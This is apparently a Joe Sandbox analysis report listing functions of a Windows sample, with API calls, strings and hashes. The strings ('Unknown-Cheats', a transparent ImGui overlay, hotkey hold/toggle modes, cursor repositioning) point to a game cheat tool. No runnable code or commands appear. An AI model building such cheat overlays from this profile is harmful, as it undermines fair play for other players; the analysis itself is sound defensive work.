Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: powf$sqrtf$cosfrandsinf$AsyncQuery_perf_counterQuery_perf_frequencyState_time64srand
String ID: @KL$VUUU
API String ID: 2870194952-515166107
Opcode ID: aade23f632b227400c50702774617c5be644bb854c5b74dd9b59626d40f17ded
Instruction ID: 83ea921d072c3dc8b5a9cb84adece00813c7e4313ded40f5745a3abf8293b104
Opcode Fuzzy Hash: aade23f632b227400c50702774617c5be644bb854c5b74dd9b59626d40f17ded
Instruction Fuzzy Hash: 8342D921D58B8A85E2729F3599411B9A374FF5A3C8F14A373E5CDA65A1FF2CB086C340

Function 00007FF69DCD7050 Relevance: 30.7, APIs: 12, Strings: 5, Instructions: 984
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF69DCE6490: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00007FF69DCD70E5), ref: 00007FF69DCE64D0
Part of subcall function 00007FF69DCE6490: memset.VCRUNTIME140(?,?,00007FF69DCD70E5), ref: 00007FF69DCE652C

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73AA
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73C6
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD73E0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD7401
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82CB
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82D2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82D9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82E0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82E7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82EE
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82F5
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD82FC

Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD57FC
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5808
Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5819
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD582D
Part of subcall function 00007FF69DCD5760: sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD583A
Part of subcall function 00007FF69DCD5760: cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5847

Strings

##Background, xrefs: 00007FF69DCD70D4
[, xrefs: 00007FF69DCD7710
2, xrefs: 00007FF69DCD76A7
2, xrefs: 00007FF69DCD7715
m, xrefs: 00007FF69DCD76A2

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$cosfpowfsinf$mallocmemsetsqrtf
String ID: ##Background$2$2$[$m
API String ID: 3051723971-1492082648
Opcode ID: a87d0b9bf0189bafa05fb9ae492a2cba66d9191b607d643dc410bafdebdd9171
Instruction ID: ed3cecee9341dfe3da221541d4d26791d76dcc7b9b8c4e41284f487e860910ab
Opcode Fuzzy Hash: a87d0b9bf0189bafa05fb9ae492a2cba66d9191b607d643dc410bafdebdd9171
Instruction Fuzzy Hash: 07B2A522D18BC589E732CF35D8413F96364FF5A398F049372EA8DA6695EF38A185C740

Function 00007FF69DCDB15E Relevance: 30.3, Strings: 23, Instructions: 1538
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 00007FF69DCDB213
9, xrefs: 00007FF69DCDB7F9
2, xrefs: 00007FF69DCDB209
RT^ON>, xrefs: 00007FF69DCDBF78
6, xrefs: 00007FF69DCDB88C
7, xrefs: 00007FF69DCDB891
8, xrefs: 00007FF69DCDB896
2, xrefs: 00007FF69DCDB878
D, xrefs: 00007FF69DCDB89F
KUTZ=, xrefs: 00007FF69DCDB24E
3, xrefs: 00007FF69DCDB87D
GaJZV6, xrefs: 00007FF69DCDB1F8
5, xrefs: 00007FF69DCDB887
3, xrefs: 00007FF69DCDB20E
:, xrefs: 00007FF69DCDB7FE
IUU<, xrefs: 00007FF69DCDB8CC
2, xrefs: 00007FF69DCDB628
zUWSO>, xrefs: 00007FF69DCDC4DB
2, xrefs: 00007FF69DCDB61D
v, xrefs: 00007FF69DCDB228
s]K4, xrefs: 00007FF69DCDB4E1
4, xrefs: 00007FF69DCDB882
6, xrefs: 00007FF69DCDB21F

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: 2$2$2$2$3$3$4$4$5$6$6$7$8$9$:$D$GaJZV6$IUU<$KUTZ=$RT^ON>$s]K4$v$zUWSO>
API String ID: 0-4245946708
Opcode ID: 41858d828e37d7783ae0d760bfe0a44044966b9d9a53e7b995b3dd3d927a7f9d
Instruction ID: 88b3744e15a93315e2302f6c0e6d3a0495dd5153eff14a7801a2ffe1054e8c7b
Opcode Fuzzy Hash: 41858d828e37d7783ae0d760bfe0a44044966b9d9a53e7b995b3dd3d927a7f9d
Instruction Fuzzy Hash: E6E2E127D29BC24AE313D63590021A5EB64EFA73C4F55D373F68472A93FF69A1828704

Function 00007FF69DCD9820 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 450
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconW.USER32 ref: 00007FF69DCD9877
LoadCursorW.USER32 ref: 00007FF69DCD9888
LoadIconW.USER32 ref: 00007FF69DCD98AC
RegisterClassExA.USER32 ref: 00007FF69DCD98BA
CreateWindowExA.USER32 ref: 00007FF69DCD990E
SetWindowLongW.USER32 ref: 00007FF69DCD9932
DwmExtendFrameIntoClientArea.DWMAPI ref: 00007FF69DCD9950
ShowWindow.USER32 ref: 00007FF69DCD9962
SetWindowPos.USER32 ref: 00007FF69DCD998E
SetLayeredWindowAttributes.USER32 ref: 00007FF69DCD99A6
UpdateWindow.USER32 ref: 00007FF69DCD99B3
D3D11CreateDeviceAndSwapChain.D3D11 ref: 00007FF69DCD9A72
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCD9AE8

Strings

+d?8+N, xrefs: 00007FF69DCD9B52, 00007FF69DCD9D1E
Unknown-Cheats, xrefs: 00007FF69DCD989A
imgui_impl_dx11, xrefs: 00007FF69DCD9F4A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Window$Load$CreateIcon$AreaAttributesChainClassClientCursorDeviceExtendFrameIntoLayeredLongRegisterShowSwapUpdatemalloc
String ID: +d?8+N$Unknown-Cheats$imgui_impl_dx11
API String ID: 2038109671-1161604074
Opcode ID: 6c79a2e9a0e70d6650a9c622e0d0ccfc5eca2b6ed4db2ebdd9c37acade1501ff
Instruction ID: d8825660ecde3576ddc4c1eaca67a0daed98b2d76e35a1bdbfdd9d06d33e7083
Opcode Fuzzy Hash: 6c79a2e9a0e70d6650a9c622e0d0ccfc5eca2b6ed4db2ebdd9c37acade1501ff
Instruction Fuzzy Hash: 0222C736E19B4286E7218F35D8402A8B774FF95788F509376EE8C63A64EF39E185C340

Function 00007FF69DCE74C0 Relevance: 27.6, APIs: 8, Strings: 10, Instructions: 600COMMON

Download Yara Rule

Strings

333?, xrefs: 00007FF69DCE7E9F
(Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming), xrefs: 00007FF69DCE8078
Remap w/ Ctrl+Shift: click anywhere to select new mouse button., xrefs: 00007FF69DCE7EFD
Middle, xrefs: 00007FF69DCE7EE8
Right, xrefs: 00007FF69DCE7EDC
Debug##Default, xrefs: 00007FF69DCE8092
HoveredId: 0x%08X, xrefs: 00007FF69DCE7EB8
Left, xrefs: 00007FF69DCE7ED0
Press ESC to abort picking., xrefs: 00007FF69DCE7EC4
NewFrame(): ClearActiveID() because it isn't marked alive anymore!, xrefs: 00007FF69DCE7539

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Debug##Default$HoveredId: 0x%08X$Left$Middle$NewFrame(): ClearActiveID() because it isn't marked alive anymore!$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right
API String ID: 0-1443573127
Opcode ID: a906df770f7fbc8baeb6c1ff89d1424eeb69913d6a7b629fe57713e86be37dbd
Instruction ID: daa906dec397c6b6aad8858b48627a396c26f76198f0b1333848d46a674db7b9
Opcode Fuzzy Hash: a906df770f7fbc8baeb6c1ff89d1424eeb69913d6a7b629fe57713e86be37dbd
Instruction Fuzzy Hash: 9362E376A086C2D6EB298F35D5452B877B8FF44B44F084176CB9D872C0EF38A956C760

Function 00007FF69DCE77F5 Relevance: 26.0, APIs: 8, Strings: 9, Instructions: 478COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE79E3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE7A21

Strings

333?, xrefs: 00007FF69DCE7E9F
(Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming), xrefs: 00007FF69DCE8078
Remap w/ Ctrl+Shift: click anywhere to select new mouse button., xrefs: 00007FF69DCE7EFD
Middle, xrefs: 00007FF69DCE7EE8
Right, xrefs: 00007FF69DCE7EDC
Debug##Default, xrefs: 00007FF69DCE8092
HoveredId: 0x%08X, xrefs: 00007FF69DCE7EB8
Left, xrefs: 00007FF69DCE7ED0
Press ESC to abort picking., xrefs: 00007FF69DCE7EC4

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free
String ID: (Auto-disabled ImGuiDebugLogFlags_EventClipper to avoid spamming)$333?$Debug##Default$HoveredId: 0x%08X$Left$Middle$Press ESC to abort picking.$Remap w/ Ctrl+Shift: click anywhere to select new mouse button.$Right
API String ID: 1294909896-3186328394
Opcode ID: c1e9fce559825455957a629ca0dc53841025109da5d8e432507ec163778051df
Instruction ID: 0a8f3aebe4c1a8834f2fdb0388cce8f8d1b4a34e7c3b09ce29164d32bad9504d
Opcode Fuzzy Hash: c1e9fce559825455957a629ca0dc53841025109da5d8e432507ec163778051df
Instruction Fuzzy Hash: 2732D3B6A086C2C6EB359F34D4452B937B8FF44B44F084276DB8D87285EF38A9568760

Function 00007FF69DCE0710 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 93
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF69DCE0738
QueryPerformanceCounter.KERNEL32 ref: 00007FF69DCE074B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE0780
LoadLibraryA.KERNEL32 ref: 00007FF69DCE0845
GetProcAddress.KERNEL32 ref: 00007FF69DCE086C
GetProcAddress.KERNEL32 ref: 00007FF69DCE0880

Strings

xinput1_3.dll, xrefs: 00007FF69DCE0803
xinput1_4.dll, xrefs: 00007FF69DCE07F7
XInputGetState, xrefs: 00007FF69DCE0872
xinput1_1.dll, xrefs: 00007FF69DCE0827
XInputGetCapabilities, xrefs: 00007FF69DCE085E
xinput1_2.dll, xrefs: 00007FF69DCE081B
xinput9_1_0.dll, xrefs: 00007FF69DCE080F
imgui_impl_win32, xrefs: 00007FF69DCE07B1

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: AddressPerformanceProcQuery$CounterFrequencyLibraryLoadmalloc
String ID: XInputGetCapabilities$XInputGetState$imgui_impl_win32$xinput1_1.dll$xinput1_2.dll$xinput1_3.dll$xinput1_4.dll$xinput9_1_0.dll
API String ID: 1729990740-3912092517
Opcode ID: 9bc4cdddebdbb24053be8490a45e6e684e4ddf6d24828bfcba824dae7251ab0d
Instruction ID: e2a189e5568ba992a586a19ef3f2c3bc67e6b0bfff50da650388a85ca58d9049
Opcode Fuzzy Hash: 9bc4cdddebdbb24053be8490a45e6e684e4ddf6d24828bfcba824dae7251ab0d
Instruction Fuzzy Hash: ED410035A19B81D5E6608B11E64027973B8FB48784F546275DBCD83B64FF3CE46AC740

Function 00007FF69DCE00B0 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

D3DCompile.D3DCOMPILER_47 ref: 00007FF69DCE016D
D3DCompile.D3DCOMPILER_47 ref: 00007FF69DCE035B
memset.VCRUNTIME140 ref: 00007FF69DCE03C7

Strings

@, xrefs: 00007FF69DCE02EB
ps_4_0, xrefs: 00007FF69DCE0335
POSITION, xrefs: 00007FF69DCE0201
cbuffer vertexBuffer : register(b0) { float4x4 ProjectionMatrix; }; struct VS_INPUT { float2 pos : POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; , xrefs: 00007FF69DCE014C
main, xrefs: 00007FF69DCE0134
COLOR, xrefs: 00007FF69DCE021D
struct PS_INPUT { float4 pos : SV_POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; }; sampler sampler0; Texture2D texture0; float4 main(PS_INPUT input) : , xrefs: 00007FF69DCE0329
TEXCOORD, xrefs: 00007FF69DCE020F
vs_4_0, xrefs: 00007FF69DCE0140

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Compile$memset
String ID: @$COLOR$POSITION$TEXCOORD$cbuffer vertexBuffer : register(b0) { float4x4 ProjectionMatrix; }; struct VS_INPUT { float2 pos : POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; $main$ps_4_0$struct PS_INPUT { float4 pos : SV_POSITION; float4 col : COLOR0; float2 uv : TEXCOORD0; }; sampler sampler0; Texture2D texture0; float4 main(PS_INPUT input) : $vs_4_0
API String ID: 2361541216-1668656389
Opcode ID: 59b769b35d07de50eb1075bb8672ede576f445791be1e2f17107f0f10b21edb3
Instruction ID: 7d86830534eccac99b0975417c7009153310eeeb25ceb2e85a99e25e1b45a8d5
Opcode Fuzzy Hash: 59b769b35d07de50eb1075bb8672ede576f445791be1e2f17107f0f10b21edb3
Instruction Fuzzy Hash: F6E1D6B6604B858AE720CF25E4847DD77B4F788B88F109126DB8C57B28DF79D689CB40

Function 00007FF69DCD8E10 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 552
keyboardstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF69DCD4CE0: memmove.VCRUNTIME140 ref: 00007FF69DCD4D18

Part of subcall function 00007FF69DCDEDA0: memmove.VCRUNTIME140(?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEDF3

strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF69DCD916B
GetAsyncKeyState.USER32 ref: 00007FF69DCD918C
memset.VCRUNTIME140 ref: 00007FF69DCD91B9
GetAsyncKeyState.USER32 ref: 00007FF69DCD91E3
GetAsyncKeyState.USER32 ref: 00007FF69DCD9209
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF69DCD97A3

Strings

Toggle, xrefs: 00007FF69DCD96EA
Hold, xrefs: 00007FF69DCD96CC
Select, xrefs: 00007FF69DCD90B5, 00007FF69DCD915B
Always, xrefs: 00007FF69DCD970C

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: AsyncState$memmove$_invalid_parameter_noinfo_noreturnmemsetstrcpy_s
String ID: Always$Hold$Select$Toggle
API String ID: 3396508257-2591452860
Opcode ID: fe55b22fb497a33fe6ad2e659cf4e7b18cebeda2a9398f534bb515cb654f4b80
Instruction ID: 08b8eda6915ed3e6e574e3f3260c2c967abfe3d0d0d0e44931ada5c1d36dec47
Opcode Fuzzy Hash: fe55b22fb497a33fe6ad2e659cf4e7b18cebeda2a9398f534bb515cb654f4b80
Instruction Fuzzy Hash: 3852E432A08785CAE721CF36D8412B97774FF99748F049376DA8C976A5EF38A585CB00

Function 00007FF69DCE1090 Relevance: 16.7, APIs: 11, Instructions: 183
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32 ref: 00007FF69DCE10DE
QueryPerformanceCounter.KERNEL32 ref: 00007FF69DCE1116
GetForegroundWindow.USER32 ref: 00007FF69DCE1159
ClientToScreen.USER32 ref: 00007FF69DCE1191
SetCursorPos.USER32 ref: 00007FF69DCE11A3
GetCursorPos.USER32 ref: 00007FF69DCE11BD
ScreenToClient.USER32 ref: 00007FF69DCE11CF
GetKeyState.USER32 ref: 00007FF69DCE1212
GetKeyState.USER32 ref: 00007FF69DCE1275
GetKeyState.USER32 ref: 00007FF69DCE12D8
GetKeyState.USER32 ref: 00007FF69DCE133B

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: State$Client$CursorScreen$CounterForegroundPerformanceQueryRectWindow
String ID:
API String ID: 1576454153-0
Opcode ID: f5eb1a4d24f708846d2937c974502832aa363529e3f28febb783f5d1bed35742
Instruction ID: fb432766c453dda4691d7bb9a0af6a3fe85c08a9a54b7197c284db4fd9034a19
Opcode Fuzzy Hash: f5eb1a4d24f708846d2937c974502832aa363529e3f28febb783f5d1bed35742
Instruction Fuzzy Hash: E4A1F1B2A08686CAE731CF30D44537977B4FB45788F0852B1E68D86A95EF3CE896C750

Function 00007FF69DCFCEA0 Relevance: 15.8, APIs: 10, Instructions: 828
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFCFE0
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCFD576
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCFD5A6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFDA42
memmove.VCRUNTIME140 ref: 00007FF69DCFDA6A
memmove.VCRUNTIME140 ref: 00007FF69DCFDA85
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFDAA4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFDACC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFDB04
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFDB29

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free$mallocmemmovesqrtf
String ID:
API String ID: 2108133213-0
Opcode ID: 7f0d27a020e663bce000dc5f22a80399d127b5d36ee05a0b42a8d4600ee5f6f1
Instruction ID: cd2002c24f0d579b22bbbc45858b9c49b785fc5b7f6ac8f7d869da464ec005e8
Opcode Fuzzy Hash: 7f0d27a020e663bce000dc5f22a80399d127b5d36ee05a0b42a8d4600ee5f6f1
Instruction Fuzzy Hash: 14728D13A287E885D3278B3650412B9B7A5EF6E784F19D333ED85A6661EF3CE4429700

Function 00007FF69DCF9840 Relevance: 15.0, APIs: 10, Instructions: 50
clipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenClipboard.USER32 ref: 00007FF69DCF984B
MultiByteToWideChar.KERNEL32 ref: 00007FF69DCF987E
GlobalAlloc.KERNEL32 ref: 00007FF69DCF9892
GlobalLock.KERNEL32 ref: 00007FF69DCF98A3
MultiByteToWideChar.KERNEL32 ref: 00007FF69DCF98C2
GlobalUnlock.KERNEL32 ref: 00007FF69DCF98CB
EmptyClipboard.USER32 ref: 00007FF69DCF98D1
SetClipboardData.USER32 ref: 00007FF69DCF98DF
GlobalFree.KERNEL32 ref: 00007FF69DCF98ED
CloseClipboard.USER32 ref: 00007FF69DCF98F3

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ClipboardGlobal$ByteCharMultiWide$AllocCloseDataEmptyFreeLockOpenUnlock
String ID:
API String ID: 1965520120-0
Opcode ID: f2a2943428e35e7a3b85aa477d9dfc28e94676e7e321c7758c7eb0cba5984f16
Instruction ID: 0069ce117c8bf8f440f18ee96b22fae8a9c7b0b8c03cd28708d3cd82b589626c
Opcode Fuzzy Hash: f2a2943428e35e7a3b85aa477d9dfc28e94676e7e321c7758c7eb0cba5984f16
Instruction Fuzzy Hash: CB118631B08B4282FB745F25BA0423962A5FF49BD9F045375DB9E87BA4EE3CD44A8740

Function 00007FF69DCF96E0 Relevance: 13.6, APIs: 9, Instructions: 96clipboardCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCF9719
OpenClipboard.USER32 ref: 00007FF69DCF9725
GetClipboardData.USER32 ref: 00007FF69DCF974A
CloseClipboard.USER32 ref: 00007FF69DCF9758
GlobalLock.KERNEL32 ref: 00007FF69DCF976D
